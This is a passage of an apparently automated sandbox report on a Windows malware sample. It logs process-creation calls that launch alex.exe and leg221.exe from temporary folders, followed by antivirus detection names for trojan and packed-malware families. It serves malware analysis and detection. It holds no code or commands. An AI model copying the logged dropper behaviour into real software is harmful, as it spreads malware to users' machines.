creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003d8
1 1 0

CreateProcessInternalW

thread_identifier: 5116
thread_handle: 0x000003ec
process_identifier: 5112
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003d8
1 1 0

CreateProcessInternalW

thread_identifier: 4276
thread_handle: 0x00000160
process_identifier: 4116
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003d8
1 1 0
Bkav W32.AIDetectMalware
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
ALYac Gen:Variant.Ser.Zusy.4824
Cylance unsafe
VIPRE Gen:Variant.Ser.Zusy.4824
Sangfor Suspicious.Win32.Save.ins
K7AntiVirus Virus ( f10000101 )
BitDefender Gen:Variant.Ser.Zusy.4824
K7GW Virus ( f10000101 )
Cybereason malicious.4895a0
Arcabit Trojan.Ser.Zusy.D12D8
Symantec ML.Attribute.HighConfidence
tehtris Generic.Malware
ESET-NOD32 a variant of Win32/Packed.Enigma.AAF
APEX Malicious
Avast WAT:Blacked-E
ClamAV Win.Trojan.Scar-6903585-0
Kaspersky UDS:DangerousObject.Multi.Generic
MicroWorld-eScan Gen:Variant.Ser.Zusy.4824
Emsisoft Gen:Variant.Ser.Zusy.4824 (B)
FireEye Generic.mg.04301ab0e3daa0be
Ikarus Trojan.Win32.VBKrypt
Google Detected
MAX malware (ai score=88)
Antiy-AVL Trojan[Packed]/Win32.Enigma
Microsoft Trojan:Win32/Sabsik.RD.A!ml
ZoneAlarm UDS:DangerousObject.Multi.Generic
GData Gen:Variant.Ser.Zusy.4824
Varist W32/Threat-HLLIE-based!Maximus
BitDefenderTheta Gen:NN.ZexaF.36680.jHW@aG3hERdk
DeepInstinct MALICIOUS
VBA32 BScope.Trojan.Bitrep
Malwarebytes Generic.Malware.AI.DDS
Panda Trj/Genetic.gen
Zoner Probably Heur.ExeHeaderL
SentinelOne Static AI - Malicious PE
AVG WAT:Blacked-E
CrowdStrike win/malicious_confidence_90% (D)